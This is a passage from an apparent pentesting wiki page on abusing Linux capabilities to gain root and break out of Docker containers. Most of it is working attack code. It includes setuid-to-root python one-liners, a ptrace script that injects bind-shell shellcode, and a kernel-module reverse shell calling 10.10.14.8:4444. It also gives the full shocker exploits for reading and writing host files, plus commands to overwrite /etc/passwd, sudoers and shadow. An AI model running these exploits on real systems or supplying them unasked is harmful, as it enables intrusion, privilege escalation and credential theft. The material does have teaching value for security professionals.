a shell with additional caps that can be inherited do: + * + * ./ambient /bin/bash + */ + +#include +#include +#include +#include +#include +#include +#include + +static void set_ambient_cap(int cap) { + int rc; + capng_get_caps_process(); + rc = capng_update(CAPNG_ADD, CAPNG_INHERITABLE, cap); + if (rc) { + printf("Cannot add inheritable cap\n"); + exit(2); + } + capng_apply(CAPNG_SELECT_CAPS); + /* Note the two 0s at the end. Kernel checks for these */ + if (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, cap, 0, 0)) { + perror("Cannot set cap"); + exit(1); + } +} +void usage(const char * me) { + printf("Usage: %s [-c caps] new-program new-args\n", me); + exit(1); +} +int default_caplist[] = { + CAP_NET_RAW, + CAP_NET_ADMIN, + CAP_SYS_NICE, + -1 +}; +int * get_caplist(const char * arg) { + int i = 1; + int * list = NULL; + char * dup = strdup(arg), * tok; + for (tok = strtok(dup, ","); tok; tok = strtok(NULL, ",")) { + list = realloc(list, (i + 1) * sizeof(int)); + if (!list) { + perror("out of memory"); + exit(1); + } + list[i - 1] = atoi(tok); + list[i] = -1; + i++; + } + return list; +} +int main(int argc, char ** argv) { + int rc, i, gotcaps = 0; + int * caplist = NULL; + int index = 1; // argv index for cmd to start + if (argc < 2) + usage(argv[0]); + if (strcmp(argv[1], "-c") == 0) { + if (argc <= 3) { + usage(argv[0]); + } + caplist = get_caplist(argv[2]); + index = 3; + } + if (!caplist) { + caplist = (int * ) default_caplist; + } + for (i = 0; caplist[i] != -1; i++) { + printf("adding %d to ambient list\n", caplist[i]); + set_ambient_cap(caplist[i]); + } + printf("Ambient forking shell\n"); + if (execv(argv[index], argv + index)) + perror("Cannot exec"); + return 0; +} +``` +{% endcode %} + +```bash +gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c +sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient +./ambient /bin/bash +``` + +Inside the **bash executed by the compiled ambient binary** it's possible to observe the **new capabilities** \(a regular user won't have any capability in the "current" section\). + +```bash +capsh --print +Current: = cap_net_admin,cap_net_raw,cap_sys_nice+eip +``` + +### Capability-aware/Capability-dumb binaries + +The **capability-aware binaries won't use the new capabilities** given by the environment, however the **capability dumb binaries will us**e them as they won't reject them. This makes capability-dumb binaries vulnerable inside a special environment that grant capabilities to binaries. + +## Service Capabilities + +By default a **service running as root will have assigned all the capabilities**, and in some occasions this may be dangerous. +Therefore, a **service configuration** file allows to **specify** the **capabilities** you want it to have, **and** the **user** that should execute the service to avoid running a service with unnecessary privileges: + +```bash +[Service] +User=bob +AmbientCapabilities=CAP_NET_BIND_SERVICE +``` + +## Malicious Use + +Capabilities are useful when you **want to restrict your own processes after performing privileged operations** \(e.g. after setting up chroot and binding to a socket\). However, they can be exploited by passing them malicious commands or arguments which are then run as root. + +You can force capabilities upon programs using `setcap`, and query these using `getcap`: + +```bash +#Set Capability +setcap cap_net_raw+ep /sbin/ping + +#Get Capability +getcap /sbin/ping +/sbin/ping = cap_net_raw+ep +``` + +The `+ep` means you’re adding the capability \(“-” would remove it\) as Effective and Permitted. + +To identify programs in a system or folder with capabilities: + +```bash +getcap -r / 2>/dev/null +``` + +### Exploitation example + +In the following example the binary `/usr/bin/python2.6` is found vulnerable to privesc: + +```bash +setcap cap_setuid+ep /usr/bin/python2.7 +/usr/bin/python2.7 = cap_setuid+ep + +#Exploit +/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");' +``` + +**Capabilities** needed by `tcpdump` to **allow any user to sniff packets**: + +```bash +setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump +getcap /usr/sbin/tcpdump +/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip +``` + +### The special case of "empty" capabilities + +Note that one can assign empty capability sets to a program file, and thus it is possible to create a set-user-ID-root program that changes the effective and saved set-user-ID of the process that executes the program to 0, but confers no capabilities to that process. Or, simply put, if you have a binary that: + +1. is not owned by root +2. has no `SUID`/`SGID` bits set +3. has empty capabilities set \(e.g.: `getcap myelf` returns `myelf =ep`\) + +then that binary will run as root. + +### CAP\_SYS\_ADMIN + +**This means that you can** **mount/umount filesystems.** + +#### Example with binary + +```bash +getcap -r / 2>/dev/null +/usr/bin/python2.7 = cap_sys_admin+ep +``` + +Using python you can mount a modified _passwd_ file on top of the real _passwd_ file: + +```bash +cp /etc/passwd ./ #Create a copy of the passwd file +openssl passwd -1 -salt abc password #Get hash of "password" +vim ./passwd #Change roots passwords of the fake passwd file +``` + +And finally **mount** the modified `passwd` file on `/etc/passwd`: + +```python +from ctypes import * +libc = CDLL("libc.so.6") +libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p) +MS_BIND = 4096 +source = b"/path/to/fake/passwd" +target = b"/etc/passwd" +filesystemtype = b"none" +options = b"rw" +mountflags = MS_BIND +libc.mount(source, target, filesystemtype, mountflags, options) +``` + +And you will be able to **`su` as root** using password "password". + +#### Example with environment \(Docker breakout\) + +You can check the enabled capabilities inside the docker container using: + +```text +capsh --print +Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read+ep +Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read +Securebits: 00/0x0/1'b0 + secure-noroot: no (unlocked) + secure-no-suid-fixup: no (unlocked) + secure-keep-caps: no (unlocked) +uid=0(root) +gid=0(root) +groups=0(root) +``` + +Inside the previous output you can see that the SYS\_ADMIN capability is enabled. + +* **Mount** + +This allows the docker container to **mount the host disk and access it freely**: + +```bash +fdisk -l #Get disk name +Disk /dev/sda: 4 GiB, 4294967296 bytes, 8388608 sectors +Units: sectors of 1 * 512 = 512 bytes +Sector size (logical/physical): 512 bytes / 512 bytes +I/O size (minimum/optimal): 512 bytes / 512 bytes + +mount /dev/sda /mnt/ #Mount it +cd /mnt +chroot ./ bash #You have a shell inside the docker hosts disk +``` + +* **Full access** + +In the previous method we managed to access the docker host disk. +In case you find that the host is running an **ssh** server, you could **create a user inside the docker host** disk and access it via SSH: + +```bash +#Like in the example before, the first step is to moun the dosker host disk +fdisk -l +mount /dev/sda /mnt/ + +#Then, search for open ports inside the docker host +nc -v -n -w2 -z 172.17.0.1 1-65535 +(UNKNOWN) [172.17.0.1] 2222 (?) open + +#Finally, create a new user inside the docker host and use it to access via SSH +chroot /mnt/ adduser john +ssh john@172.17.0.1 -p 2222 +``` + +### CAP\_SYS\_PTRACE + +**This means that you can escape the container by injecting a shellcode inside some process running inside the host.** + +#### Example with binary + +```bash +getcap -r / 2>/dev/null +/usr/bin/python2.7 = cap_sys_ptrace+ep +``` + +```python +import ctypes +import sys +import struct +# Macros defined in +# https://code.woboq.org/qt5/include/sys/ptrace.h.html +PTRACE_POKETEXT = 4 +PTRACE_GETREGS = 12 +PTRACE_SETREGS = 13 +PTRACE_ATTACH = 16 +PTRACE_DETACH = 17 +# Structure defined in +# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct +class user_regs_struct(ctypes.Structure): + _fields_ = [ + ("r15", ctypes.c_ulonglong), + ("r14", ctypes.c_ulonglong), + ("r13", ctypes.c_ulonglong), + ("r12", ctypes.c_ulonglong), + ("rbp", ctypes.c_ulonglong), + ("rbx", ctypes.c_ulonglong), + ("r11", ctypes.c_ulonglong), + ("r10", ctypes.c_ulonglong), + ("r9", ctypes.c_ulonglong), + ("r8", ctypes.c_ulonglong), + ("rax", ctypes.c_ulonglong), + ("rcx", ctypes.c_ulonglong), + ("rdx", ctypes.c_ulonglong), + ("rsi", ctypes.c_ulonglong), + ("rdi", ctypes.c_ulonglong), + ("orig_rax", ctypes.c_ulonglong), + ("rip", ctypes.c_ulonglong), + ("cs", ctypes.c_ulonglong), + ("eflags", ctypes.c_ulonglong), + ("rsp", ctypes.c_ulonglong), + ("ss", ctypes.c_ulonglong), + ("fs_base", ctypes.c_ulonglong), + ("gs_base", ctypes.c_ulonglong), + ("ds", ctypes.c_ulonglong), + ("es", ctypes.c_ulonglong), + ("fs", ctypes.c_ulonglong), + ("gs", ctypes.c_ulonglong), + ] + +libc = ctypes.CDLL("libc.so.6") + +pid=int(sys.argv[1]) + +# Define argument type and respone type. +libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p] +libc.ptrace.restype = ctypes.c_uint64 + +# Attach to the process +libc.ptrace(PTRACE_ATTACH, pid, None, None) +registers=user_regs_struct() + +# Retrieve the value stored in registers +libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers)) +print("Instruction Pointer: " + hex(registers.rip)) +print("Injecting Shellcode at: " + hex(registers.rip)) + +# Shell code copied from exploit db. https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c +shellcode = "\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05" + +# Inject the shellcode into the running process byte by byte. +for i in xrange(0,len(shellcode),4): + # Convert the byte to little endian. + shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16) + shellcode_byte_little_endian=struct.pack("/dev/null +/usr/bin/python2.7 = cap_sys_module+ep +``` + +By default, **`modprobe`** command checks for dependency list and map files in the directory **`/lib/modules/$(uname -r)`**. +In order to abuse this, lets create a fake **lib/modules** folder: + +```bash +mkdir lib/modules -p +cp -a /lib/modules/5.0.0-20-generic/ lib/modules/$(uname -r) +``` + +Then **compile the kernel module you can find 2 examples below and copy** it to this folder: + +```bash +cp reverse-shell.ko lib/modules/$(uname -r)/ +``` + +Finally, execute the needed python code to load this kernel module: + +```python +import kmod +km = kmod.Kmod() +km.set_mod_dir("/path/to/fake/lib/modules/5.0.0-20-generic/") +km.modprobe("reverse-shell") +``` + +#### Example 2 with binary + +In the following example the binary **`kmod`** has this capability. + +```bash +getcap -r / 2>/dev/null +/bin/kmod = cap_sys_module+ep +``` + +Which means that it's possible to use the command **`insmod`** to insert a kernel module. Follow the example below to get a **reverse shell** abusing this privilege. + +#### Example with environment \(Docker breakout\) + +You can check the enabled capabilities inside the docker container using: + +```text +capsh --print +Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep +Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap +Securebits: 00/0x0/1'b0 + secure-noroot: no (unlocked) + secure-no-suid-fixup: no (unlocked) + secure-keep-caps: no (unlocked) +uid=0(root) +gid=0(root) +groups=0(root) +``` + +Inside the previous output you can see that the **SYS\_MODULE** capability is enabled. + +**Create** the **kernel module** that is going to execute a reverse shell and the **Makefile** to **compile** it: + +{% code title="reverse-shell.c" %} +```c +#include +#include +MODULE_LICENSE("GPL"); +MODULE_AUTHOR("AttackDefense"); +MODULE_DESCRIPTION("LKM reverse shell module"); +MODULE_VERSION("1.0"); + +char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.8/4444 0>&1", NULL}; +static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL }; + +// call_usermodehelper function is used to create user mode processes from kernel space +static int __init reverse_shell_init(void) { + return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); +} + +static void __exit reverse_shell_exit(void) { + printk(KERN_INFO "Exiting\n"); +} + +module_init(reverse_shell_init); +module_exit(reverse_shell_exit); +``` +{% endcode %} + +{% code title="Makefile" %} +```bash +obj-m +=reverse-shell.o + +all: + make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules + +clean: + make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean +``` +{% endcode %} + +{% hint style="warning" %} +The blank char before each make word in the Makefile **must be a tab, not spaces**! +{% endhint %} + +Execute `make` to compile it. + +Finally, start `nc` inside a shell and **load the module** from another one and you will capture the shell in the nc process: + +```bash +#Shell 1 +nc -lvnp 4444 + +#Shell 2 +insmod reverse-shell.ko #Launch the reverse shell +``` + +**The code of this technique was copied from the laboratory of "Abusing SYS\_MODULE Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com/) + +### CAP\_DAC\_READ\_SEARCH + +**This means that you can** **bypass can bypass file read permission checks and directory read/execute permission checks.** + +#### Example with binary + +The binary will be able to read any file. So, if a file like tar has this capability it will be able to read the shadow file: + +```bash +cd /etc +tar -czf /tmp/shadow.tar.gz shadow #Compress show file in /tmp +cd /tmp +tar -cxf shadow.tar.gz +``` + +#### Example with binary2 + +In this case lets suppose that **`python`** binary has this capability. In order to list root files you could do: + +```python +import os +for r, d, f in os.walk('/root'): + for filename in f: + print(filename) +``` + +And in order to read a file you could do: + +```python +print(open("/etc/shadow", "r").read()) +``` + +#### Example with _\*\*_Environment \(Docker breakout\) + +You can check the enabled capabilities inside the docker container using: + +```text +capsh --print +Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep +Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap +Securebits: 00/0x0/1'b0 + secure-noroot: no (unlocked) + secure-no-suid-fixup: no (unlocked) + secure-keep-caps: no (unlocked) +uid=0(root) +gid=0(root) +groups=0(root) +``` + +Inside the previous output you can see that the **DAC\_READ\_SEARCH** capability is enabled. As a result, the container can **debug processes**. + +You can learn how the following exploiting works in [https://medium.com/@fun\_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3) but in resume **CAP\_DAC\_READ\_SEARCH** not only allows us to traverse the file system without permission checks, but also explicitly removes any checks to _**open\_by\_handle\_at\(2\)**_ and **could allow our process to sensitive files opened by other processes**. + +The original exploit that abuse this permissions to read files from the host can be found here: [http://stealth.openwall.net/xSports/shocker.c](http://stealth.openwall.net/xSports/shocker.c), the following is a **modified version that allows you to indicate the file you want to read as first argument and dump it in a file.** + +```c +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +// gcc shocker.c -o shocker +// ./socker /etc/shadow shadow #Read /etc/shadow from host and save result in shadow file in current dir + +struct my_file_handle { + unsigned int handle_bytes; + int handle_type; + unsigned char f_handle[8]; +}; + +void die(const char * msg) { + perror(msg); + exit(errno); +} + +void dump_handle(const struct my_file_handle * h) { + fprintf(stderr, "[*] #=%d, %d, char nh[] = {", h -> handle_bytes, + h -> handle_type); + for (int i = 0; i < h -> handle_bytes; ++i) { + fprintf(stderr, "0x%02x", h -> f_handle[i]); + if ((i + 1) % 20 == 0) + fprintf(stderr, "\n"); + if (i < h -> handle_bytes - 1) + fprintf(stderr, ", "); + } + fprintf(stderr, "};\n"); +} + +int find_handle(int bfd, + const char * path, + const struct my_file_handle * ih, struct my_file_handle * + oh) { + int fd; + uint32_t ino = 0; + struct my_file_handle outh = { + .handle_bytes = 8, + .handle_type = 1 + }; + DIR * dir = NULL; + struct dirent * de = NULL; + path = strchr(path, '/'); + // recursion stops if path has been resolved + if (!path) { + memcpy(oh -> f_handle, ih -> f_handle, sizeof(oh -> f_handle)); + oh -> handle_type = 1; + oh -> handle_bytes = 8; + return 1; + } + ++path; + fprintf(stderr, "[*] Resolving '%s'\n", path); + if ((fd = open_by_handle_at(bfd, (struct file_handle * ) ih, O_RDONLY)) < 0) + die("[-] open_by_handle_at"); + if ((dir = fdopendir(fd)) == NULL) + die("[-] fdopendir"); + for (;;) { + de = readdir(dir); + if (!de) + break; + fprintf(stderr, "[*] Found %s\n", de -> d_name); + if (strncmp(de -> d_name, path, strlen(de -> d_name)) == 0) { + fprintf(stderr, "[+] Match: %s ino=%d\n", de -> d_name, (int) de -> d_ino); + ino = de -> d_ino; + break; + } + } + + fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n"); + if (de) { + for (uint32_t i = 0; i < 0xffffffff; ++i) { + outh.handle_bytes = 8; + outh.handle_type = 1; + memcpy(outh.f_handle, & ino, sizeof(ino)); + memcpy(outh.f_handle + 4, & i, sizeof(i)); + if ((i % (1 << 20)) == 0) + fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de -> d_name, i); + if (open_by_handle_at(bfd, (struct file_handle * ) & outh, 0) > 0) { + closedir(dir); + close(fd); + dump_handle( & outh); + return find_handle(bfd, path, & outh, oh); + } + } + } + closedir(dir); + close(fd); + return 0; +} + +int main(int argc, char * argv[]) { + char buf[0x1000]; + int fd1, fd2; + struct my_file_handle h; + struct my_file_handle root_h = { + .handle_bytes = 8, + .handle_type = 1, + .f_handle = { + 0x02, + 0, + 0, + 0, + 0, + 0, + 0, + 0 + } + }; + fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n" + "[***] The tea from the 90's kicks your sekurity again. [***]\n" + "[***] If you have pending sec consulting, I'll happily [***]\n" + "[***] forward to my friends who drink secury-tea too! [***]\n\n\n"); + read(0, buf, 1); + // get a FS reference from something mounted in from outside + if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0) + die("[-] open"); + if (find_handle(fd1, argv[1], & root_h, & h) <= 0) + die("[-] Cannot find valid handle!"); + fprintf(stderr, "[!] Got a final handle!\n"); + dump_handle( & h); + if ((fd2 = open_by_handle_at(fd1, (struct file_handle * ) & h, O_RDWR)) < 0) + die("[-] open_by_handle"); + char * line = NULL; + size_t len = 0; + FILE * fptr; + ssize_t read; + fptr = fopen(argv[2], "r"); + while ((read = getline( & line, & len, fptr)) != -1) { + write(fd2, line, read); + } + printf("Success!!\n"); + close(fd2); + close(fd1); + return 0; +} +``` + +{% hint style="danger" %} +I exploit needs to find a pointer to something mounted on the host. The original exploit used the file `/.dockerinit` and this modified version uses `/etc/hostname`. **If the exploit isn't working** maybe you need to set a different file. To find a file that is mounted in the host just execute `mount` command: +{% endhint %} + +![](../../.gitbook/assets/image%20%28407%29.png) + +**The code of this technique was copied from the laboratory of "Abusing DAC\_READ\_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com/) + +### CAP\_DAC\_OVERRIDE + +**This mean that you can bypass write permission checks on any file, so you can write any file.** + +There are a lot of files you can **overwrite to escalate privileges,** [**you can get ideas from here**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges). + +#### Example with binary + +In this example vim has this capability, so you can modify any file like _passwd_, _sudoers_ or _shadow_: + +```bash +getcap -r / 2>/dev/null +/usr/bin/vim = cap_dac_override+ep + +vim /etc/sudoers #To overwrite it +``` + +#### Example with binary 2 + +In this example **`python`** binary will have this capability. You could use python to override any file: + +```python +file=open("/etc/sudoers","a") +file.write("yourusername ALL=(ALL) NOPASSWD:ALL") +file.close() +``` + +#### Example with environment + CAP\_DAC\_READ\_SEARCH \(Docker breakout\) + +You can check the enabled capabilities inside the docker container using: + +```text +capsh --print +Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep +Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap +Securebits: 00/0x0/1'b0 + secure-noroot: no (unlocked) + secure-no-suid-fixup: no (unlocked) + secure-keep-caps: no (unlocked) +uid=0(root) +gid=0(root) +groups=0(root) +``` + +First of all read the previous section that [**abuses DAC\_READ\_SEARCH capability to read arbitrary files**](linux-capabilities.md#cap_dac_read_search) of the host and **compile** the exploit. +Then, **compile the following version of the shocker exploit** that ill allow you to **write arbitrary files** inside the hosts filesystem: + +```c +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +// gcc shocker_write.c -o shocker_write +// ./shocker_write /etc/passwd passwd + +struct my_file_handle { + unsigned int handle_bytes; + int handle_type; + unsigned char f_handle[8]; +}; +void die(const char * msg) { + perror(msg); + exit(errno); +} +void dump_handle(const struct my_file_handle * h) { + fprintf(stderr, "[*] #=%d, %d, char nh[] = {", h -> handle_bytes, + h -> handle_type); + for (int i = 0; i < h -> handle_bytes; ++i) { + fprintf(stderr, "0x%02x", h -> f_handle[i]); + if ((i + 1) % 20 == 0) + fprintf(stderr, "\n"); + if (i < h -> handle_bytes - 1) + fprintf(stderr, ", "); + } + fprintf(stderr, "};\n"); +} +int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh) +{ + int fd; + uint32_t ino = 0; + struct my_file_handle outh = { + .handle_bytes = 8, + .handle_type = 1 + }; + DIR * dir = NULL; + struct dirent * de = NULL; + path = strchr(path, '/'); + // recursion stops if path has been resolved + if (!path) { + memcpy(oh -> f_handle, ih -> f_handle, sizeof(oh -> f_handle)); + oh -> handle_type = 1; + oh -> handle_bytes = 8; + return 1; + } + ++path; + fprintf(stderr, "[*] Resolving '%s'\n", path); + if ((fd = open_by_handle_at(bfd, (struct file_handle * ) ih, O_RDONLY)) < 0) + die("[-] open_by_handle_at"); + if ((dir = fdopendir(fd)) == NULL) + die("[-] fdopendir"); + for (;;) { + de = readdir(dir); + if (!de) + break; + fprintf(stderr, "[*] Found %s\n", de -> d_name); + if (strncmp(de -> d_name, path, strlen(de -> d_name)) == 0) { + fprintf(stderr, "[+] Match: %s ino=%d\n", de -> d_name, (int) de -> d_ino); + ino = de -> d_ino; + break; + } + } + fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n"); + if (de) { + for (uint32_t i = 0; i < 0xffffffff; ++i) { + outh.handle_bytes = 8; + outh.handle_type = 1; + memcpy(outh.f_handle, & ino, sizeof(ino)); + memcpy(outh.f_handle + 4, & i, sizeof(i)); + if ((i % (1 << 20)) == 0) + fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de -> d_name, i); + if (open_by_handle_at(bfd, (struct file_handle * ) & outh, 0) > 0) { + closedir(dir); + close(fd); + dump_handle( & outh); + return find_handle(bfd, path, & outh, oh); + } + } + } + closedir(dir); + close(fd); + return 0; +} +int main(int argc, char * argv[]) { + char buf[0x1000]; + int fd1, fd2; + struct my_file_handle h; + struct my_file_handle root_h = { + .handle_bytes = 8, + .handle_type = 1, + .f_handle = { + 0x02, + 0, + 0, + 0, + 0, + 0, + 0, + 0 + } + }; + fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n" + "[***] The tea from the 90's kicks your sekurity again. [***]\n" + "[***] If you have pending sec consulting, I'll happily [***]\n" + "[***] forward to my friends who drink secury-tea too! [***]\n\n\n"); + read(0, buf, 1); + // get a FS reference from something mounted in from outside + if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0) + die("[-] open"); + if (find_handle(fd1, argv[1], & root_h, & h) <= 0) + die("[-] Cannot find valid handle!"); + fprintf(stderr, "[!] Got a final handle!\n"); + dump_handle( & h); + if ((fd2 = open_by_handle_at(fd1, (struct file_handle * ) & h, O_RDWR)) < 0) + die("[-] open_by_handle"); + char * line = NULL; + size_t len = 0; + FILE * fptr; + ssize_t read; + fptr = fopen(argv[2], "r"); + while ((read = getline( & line, & len, fptr)) != -1) { + write(fd2, line, read); + } + printf("Success!!\n"); + close(fd2); + close(fd1); + return 0; +} +``` + +In order to scape the docker container you could **download** the files `/etc/shadow` and `/etc/passwd` from the host, **add** to them a **new user**, and use **`shocker_write`** to overwrite them. Then, **access** via **ssh**. + +**The code of this technique was copied from the laboratory of "Abusing DAC\_OVERRIDE Capability" from** [**https://www.pentesteracademy.com**](https://www.pentesteracademy.com/) + +### CAP\_CHOWN + +**This means that it's possible to change the ownership of any file.** + +#### Example with binary + +Lets suppose the **`python`** binary has this capability, you can **change** the **owner** of the **shadow** file, **change root password**, and escalate privileges: + +```bash +python -c 'import os;os.chown("/etc/shadow",1000,1000)' +``` + +### CAP\_FOWNER + +**This means that it's possible to change the permission of any file.** + +#### Example with binary + +If python has this capability you can modify the permissions of the shadow file, **change root password**, and escalate privileges: + +```bash +python -c 'import os;os.chmod("/etc/shadow",0666) +``` + +### CAP\_SETUID + +**This means that it's possible to set the effective user id of the created process.** + +#### Example with binary + +If python has this **capability**, you can very easily abuse it to escalate privileges to root: + +```python +import os +os.setuid(0) +os.system("/bin/bash") +``` + +**Another way:** + +```python +import os +import prctl +#add the capability to the effective set +prctl.cap_effective.setuid = True +os.setuid(0) +os.system("/bin/bash") +``` + +### CAP\_SETGID + +**This means that it's possible to set the effective group id of the created process.** + +There are a lot of files you can **overwrite to escalate privileges,** [**you can get ideas from here**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges). + +#### Example with binary + +In this case you should look for interesting files that a group can read because you can impersonate any group: + +```bash +#Find every file writable by a group +find / -perm /g=w -exec ls -lLd {} \; 2>/dev/null +#Find every file writable by a group in /etc with a maxpath of 1 +find /etc -maxdepth 1 -perm /g=w -exec ls -lLd {} \; 2>/dev/null +#Find every file readable by a group in /etc with a maxpath of 1 +find /etc -maxdepth 1 -perm /g=r -exec ls -lLd {} \; 2>/dev/null +``` + +Once you have find a file you can abuse \(via reading or writing\) to escalate privileges you can **get a shell impersonating the interesting group** with: + +```python +import os +os.setgid(42) +os.system("/bin/bash") +``` + +In this case the group shadow was impersonated so you can read the file `/etc/shadow`: + +```bash +cat /etc/shadow +``` + +If **docker** is installed you could **impersonate** the **docker group** and abuse it to communicate with the [**docker socket** and escalate privileges](./#writable-docker-socket). + +### CAP\_SETFCAP + +**This means that it's possible to set capabilities on files and processes** + +#### Example with binary + +If python has this **capability**, you can very easily abuse it to escalate privileges to root: + +{% code title="setcapability.py" %} +```python +import ctypes, sys + +#Load needed library +#You can find which library you need to load checking the libraries of local setcap binary +# ldd /sbin/setcap +libcap = ctypes.cdll.LoadLibrary("libcap.so.2") + +libcap.cap_from_text.argtypes = [ctypes.c_char_p] +libcap.cap_from_text.restype = ctypes.c_void_p +libcap.cap_set_file.argtypes = [ctypes.c_char_p,ctypes.c_void_p] + +#Give setuid cap to the binary +cap = 'cap_setuid+ep' +path = sys.argv[1] +print(path) +cap_t = libcap.cap_from_text(cap) +status = libcap.cap_set_file(path,cap_t) + +if(status == 0): + print (cap + " was successfully added to " + path) +``` +{% endcode %} + +```bash +python setcapability.py /usr/bin/python2.7 +``` + +{% hint style="warning" %} +Note that if you set a new capability to the binary with CAP\_SETFCAP, you will lose this cap. +{% endhint %} + +Once you have [SETUID capability](linux-capabilities.md#cap_setuid) you can go to it's section to see how to escalate privileges. + +### CAP\_KILL + +**This means that it's possible to kill any process.** You cannot escalate privileges directly with this capability. + +#### Example with binary + +Lets suppose the **`python`** binary has this capability. If you could **also modify some service or socket configuration** \(or any configuration file related to a service\) file, you could backdoor it, and then kill the process related to that service and wait for the new configuration file to be executed with your backdoor. + +```python +#Use this python code to kill arbitrary processes +import os +import signal +pgid = os.getpgid(341) +os.killpg(pgid, signal.SIGKILL) +``` + +### CAP\_NET\_BIND\_SERVICE + +**This means that it's possible to listen in any port \(even in privileged ones\).** You cannot escalate privileges directly with this capability. + +#### Example with binary + +If **`python`** has this capability it will be able to listen on any port and even connect from it to any other port \(some services require connections from specific privileges ports\) + +{% tabs %} +{% tab title="Listen" %} +```python +import socket +s=socket.socket() +s.bind(('0.0.0.0', 80)) +s.listen(1) +conn, addr = s.accept() +while True: + output = connection.recv(1024).strip(); + print(output) +``` +{% endtab %} + +{% tab title="Connect" %} +```python +import socket +s=socket.socket() +s.bind(('0.0.0.0',500)) +s.connect(('10.10.10.10',500)) +``` +{% endtab %} +{% endtabs %} + +### CAP\_NET\_RAW + +**This means that it's possible to sniff traffic.** You cannot escalate privileges directly with this capability. + 